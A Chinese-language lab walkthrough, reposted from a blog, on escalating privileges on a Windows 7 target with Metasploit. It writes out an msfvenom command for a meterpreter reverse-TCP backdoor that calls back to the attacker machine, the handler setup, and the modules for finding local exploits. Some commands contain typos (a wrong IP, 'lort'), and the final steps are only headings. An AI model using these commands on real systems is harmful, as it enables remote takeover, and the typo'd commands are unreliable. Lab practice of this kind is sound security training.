Metaspolit使用篇(三)-Windows提权实例
前言
靶机:
- 192.168.10.177(Windows 7)
- phpstudy
攻击机:
- 192.168.10.132(kali)
一、getshell
通过Web漏洞,已经getshell,通过Webshell工具Godzilla连接。因为是通过phpstudy模拟环境,phpstudy是Windows登录用户启动的,所以直接拿到普通用户的权限。Mandatory Label\Medium Mandatory Level
,说明这是一个标准用户。接下来,将权限从普通用户提升到管理员,也就是Mandatory Label\High Mandatory Level
二、使用MSF提权
- msfvenom生成exe格式反弹shell后门
msf.exe
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.16.10.132 lport=3333 -f exe -o msf.exe
- 利用Godzilla上传后门
msf.exe
- 配置监听会话
进入msfconsole
,执行:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lort 3333
- 用Godzilla命令执行模块启动后门
msf.exe
,上线
- 使用提权信息收集模块
半自动化:use post/windows/gather/enum_patchs
全自动化:use post/multi/recon/local_exploit_suggester
使用全自动化的
6. 使用提权模块
7. 提权成功
原文地址:https://blog.csdn.net/weixin_45626840/article/details/142874707
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!